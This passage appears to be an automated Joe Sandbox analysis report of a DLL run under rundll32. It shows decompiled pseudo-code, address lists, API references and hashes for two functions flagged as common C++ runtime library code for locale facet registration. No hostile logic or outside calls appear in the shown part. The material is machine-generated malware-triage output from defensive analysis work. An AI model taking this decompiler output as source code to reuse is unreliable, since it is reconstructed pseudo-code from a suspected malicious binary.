				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t242 - 0x14, 0);
				_t231 =  *0x6e2c6e34; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1E161C(0x6e2c6e14);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E2066BA(_t242 - 0x14);
					return E6E220075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E21C0B8(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t242 - 0x20);
							E6E223D74(_t242 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t225, _t231, 0x14);
							E6E206653(_t242 - 0x14, 0);
							_t232 =  *0x6e2c6e3c; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1E161C(0x6e2c6e1c);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E2066BA(_t242 - 0x14);
								return E6E220075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E21C120(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t242 - 0x20);
										E6E223D74(_t242 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t172, _t226, _t232, 0x14);
										E6E206653(_t242 - 0x14, 0);
										_t233 =  *0x6e2c6e38; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1E161C(0x6e2c6e18);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E2066BA(_t242 - 0x14);
											return E6E220075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E21C1A4(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t242 - 0x20);
													E6E223D74(_t242 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t172, _t227, _t233, 0x14);
													E6E206653(_t242 - 0x14, 0);
													_t234 =  *0x6e2c6e40; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1E161C(0x6e2c6e20);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E2066BA(_t242 - 0x14);
														return E6E220075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E21C229(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t242 - 0x20);
																E6E223D74(_t242 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t172, _t228, _t234, 0x14);
																E6E206653(_t242 - 0x14, 0);
																_t235 =  *0x6e2c6e44; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1E161C(0x6e2c6e24);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E2066BA(_t242 - 0x14);
																	return E6E220075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E21C295(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1E1438(_t207);
																			E6E223D74(_t242 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e26851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e26c414;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E21D028(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E220075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E206FD3(__eflags, _t229);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e2c6e44 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E206FD3(__eflags, _t228);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e2c6e40 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E206FD3(__eflags, _t227);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e2c6e38 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E206FD3(__eflags, _t226);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e2c6e3c = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E206FD3(__eflags, _t225);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e2c6e34 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}





















                          0x6e21b93e
                          0x6e21b93e
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b96f
                          0x6e21b974
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B945
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B94F
                          • int.LIBCPMT ref: 6E21B966
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21B9A0
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B9C0
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B9DE
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
                          • Instruction ID: b30431928973617535b6f04673bde7e034cd3064f742672db61ea0d389a179d7
                          • Opcode Fuzzy Hash: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
                          • Instruction Fuzzy Hash: 5F11BC7990451ECBCB04EBE0C894AEDB7BBBF44B14F140919E510AB390DBB49E45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F94B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F94B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t286 - 0x14, 0);
				_t273 =  *0x6e2c6ddc; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1E161C(0x6e2c6d88);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E2066BA(_t286 - 0x14);
					return E6E220075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E211409(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t286 - 0x20);
							E6E223D74(_t286 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t266, _t273, 0x14);
							E6E206653(_t286 - 0x14, 0);
							_t274 =  *0x6e2c6de0; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1E161C(0x6e2c6d8c);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E2066BA(_t286 - 0x14);
								return E6E220075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E211471(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t286 - 0x20);
										E6E223D74(_t286 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t203, _t267, _t274, 0x14);
										E6E206653(_t286 - 0x14, 0);
										_t275 =  *0x6e2c6dfc; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1E161C(0x6e2c6da8);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E2066BA(_t286 - 0x14);
											return E6E220075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E2114EC(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t286 - 0x20);
													E6E223D74(_t286 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t203, _t268, _t275, 0x14);
													E6E206653(_t286 - 0x14, 0);
													_t276 =  *0x6e2c6dcc; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1E161C(0x6e2c6d80);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E2066BA(_t286 - 0x14);
														return E6E220075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E211558(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t286 - 0x20);
																E6E223D74(_t286 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t203, _t269, _t276, 0x14);
																E6E206653(_t286 - 0x14, 0);
																_t277 =  *0x6e2c6e00; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1E161C(0x6e2c6dac);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E2066BA(_t286 - 0x14);
																	return E6E220075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E2115C4(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t286 - 0x20);
																			E6E223D74(_t286 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t203, _t270, _t277, 0x14);
																			E6E206653(_t286 - 0x14, 0);
																			_t278 =  *0x6e2c6dd0; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1E161C(0x6e2c6d60);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E2066BA(_t286 - 0x14);
																				return E6E220075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6E21162A(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1E1438(_t245);
																						E6E223D74(_t286 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e26851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6e26c0c4;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E21542F(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E220075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E206FD3(__eflags, _t271);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e2c6dd0 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E206FD3(__eflags, _t270);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e2c6e00 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E206FD3(__eflags, _t269);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e2c6dcc = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E206FD3(__eflags, _t268);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e2c6dfc = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E206FD3(__eflags, _t267);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e2c6de0 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E206FD3(__eflags, _t266);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e2c6ddc = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}
























                          0x6e20f94b
                          0x6e20f94b
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f97c
                          0x6e20f981
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F952
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F95C
                          • int.LIBCPMT ref: 6E20F973
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F9AD
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F9CD
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F9EB
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
